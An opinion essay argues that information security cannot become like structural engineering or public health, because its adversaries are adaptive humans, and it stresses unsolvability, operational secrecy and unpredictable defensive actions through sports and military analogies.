Human Adversaries: Why Information Security is Unlike Engineering
A common theme among information security commenters and keynotes is that infosec can and either will or should evolve to be more like structural engineering, product safety, or similar successful fields. Facing an unending onslaught of breaches, we all wish we had the level of assurance and success fields such as structural engineering, product safety, and public health have had, as they have all but eliminating the risk of dying in a commercial aircraft accident or dying from polio. Why don’t we follow the same process to stop getting hacked?
DO WE WANT OUR DAILY LIVES TO OPERATE LIKE A BATTLEFIELD CONSTANTLY SURVEILLING FOR ATTACKERS AND FIGHTING THEM OFF? LIKELY WITH A LOT OF SECRECY?
OR DO WE WANT TO USE SAFE EQUIPMEN AND FOLLOW GOOD HYGIENE?
While I can empathize with the desire, fundamental differences exist between fields with human adversaries and those without that are easy to miss if you are unfamiliar with offensive operations. There are many ways to break down these differences, which I’ve summarized in the table below, but a simple way to think about it is that in the fields without human adversaries (e.g. building bridges) once you have found a solution, (make sure your cables can support the expected loads and stresses) you can standardize that solution and be basically done. If your bridge doesn’t fall down from its own weight, gravity isn’t going to change directions, pulling it down sideways, or send a commando team to cut the suspension cables until it does fall down.
Would a Cyber-UL make us secure like UL makes us safe? Unlikely, but it might help a little.
In contrast, human adversaries means your opposition is adaptable, intelligent, and goal-driven. These essential differences cause tactical and strategic differences:
These differences basically boil down to three related ideas: unsolvability, keeping secrets, and intentionally taking unexpected actions.
Unsolvability means that we cannot reach a final win state, in which failures are impossible or so rare they are unheard of, like we have against polio or in safe bridge-building. This comes not only from the persistence of human adversaries, but also from human vulnerability. Vulnerabilities can come from software errors, which will always be with us, but even if all software bugs and exploits disappeared, 95% of hacking groups would still be 99% as effective. Groups like the Desert Falcons operate just as effectively without exploits as other groups do with them. As long as people can choose to run code that can both read data and communicate over the internet, they will be hacked in a similar way; and these core abilities will always be present, since without them, you lose the benefits of using a computer in the first place. Social engineering attack vectors are often downplayed by technical experts who won’t fall for generic pretexts, but well-researched, well-timed, individual attacks are successful against most users. Antivirus cannot solve the problem since it is impossible to generically distinguish between good and bad software; silently exfiltrating all your files over an encrypted connection is exactly what legitimate backup applications do after all. So a successful attack will never be much harder than the average backup app development.
Finally, even in the impossible case that there were no exploits, and people could no longer run arbitrary code on computers, if users can type in passwords to the wrong site or click an OAuth button or recover lost account access or have any other way of accessing their data and services from another computer, they will still be hacked just like some of the most well-known celebrities. We can do much better than we have been doing, but we fool ourselves if we think we can get to a brush-your-teeth-and-you-are-good state without paying attention to what adversaries are doing. We can make safer equipment, but we must be constantly vigilant since there are no useful computers that are “safe equipment” against malicious attacks and there never can be. Only the Amish have seen the end of cyberwar.
In the engineering safety fields, there is no benefit to keeping any safety measures or procedures secret. While fields with human adversaries, such as military, intelligence, and sports, also have many public and standard procedures, they depend on secret measures as well. If the other team knows your game plan, they will be able to prepare for it and counteract it. This is why “Spygate” was such a controversy in football and why signals are obfuscated, pitch selection is secret, and stealing signs is an issue in baseball.
In information security, if an incident responder tips their hand about a detection too soon, an alert adversary will be able to obfuscate or hide any activity using the detected malware, domain, or other indicators, and the defenders will be unable to track down nearly as many compromised nodes, malware modules, or exploits as before. Operational secrecy is essential at times since human adversaries will act on the information they can find, unlike non-human adversaries.
DOING THE UNEXPECTED
In fields without a human adversary, the steps to follow to ensure e.g. a flight is safe, from flight plan to checking the flaps, must be performed in the same manner each time to ensure the same, safe result. In fields with human adversaries, although some actions will be standardized, complete predictability is a recipe for failure. On virtually every football play, the offense must keep the defense on their toes as different running routes and receivers must remain options; if the defense knew exactly where the QB would throw the ball, they would be able to block the receiver and intercept the throw. This applies to defense as well as offense; in order for a top-notch defensive lineman like J.J. Watt to pressure or even sack the QB, he must dodge and spin to the side to go somewhere the offensive line doesn’t expect, just like a pitcher in baseball or a defensive steal in basketball or a defensive military strike.
In information security, those who have conducted offensive operations know that offensive groups will never send an attack they believe will be stopped by defensive measures. It does not matter if it is a large-scale email malware campaign from a garden variety criminal or a highly targeted intrusion by an intelligence agency, the authors will test their malware against all the security software that they might encounter, modifying it until it is undetected by those public products.
Offense cannot win unless it does something unexpected; and likewise defense will never detect or stop the intrusion without doing something unexpected as well. It may be a custom application or network whitelist, private threat intel sharing if you’re lucky with your adversaries, using non-standard configurations to block common social engineering vectors, and/or something else, but if your organization is going to stop common attacks, it needs to do something unexpected. To be extra clear; the debate is not and has never been about whether some standardization is useful, or even whether most things should be standardized; no one doubts that they should. The debate is about whether information security personnel should ever maintain operational secrecy or plan on taking unexpected actions.
The bottom line is that yes, it would be nice if information security was like those engineering and medical fields and did not have to deal with human adversaries. It would be nice if we could just use safe software, follow a checklist, and not worry about attacks the same way we do not worry about whether a bridge will support us. It would be nice if adversaries did not adapt and specifically prepare attacks that will bypass the most common defensive measures. It would be nice if attackers were just a disease, pest, or accident that we could vaccinate, spray, or certify away. But we have intelligent, adaptive, goal-driven, human adversaries. So let’s learn from the fields that have been dealing with them for centuries.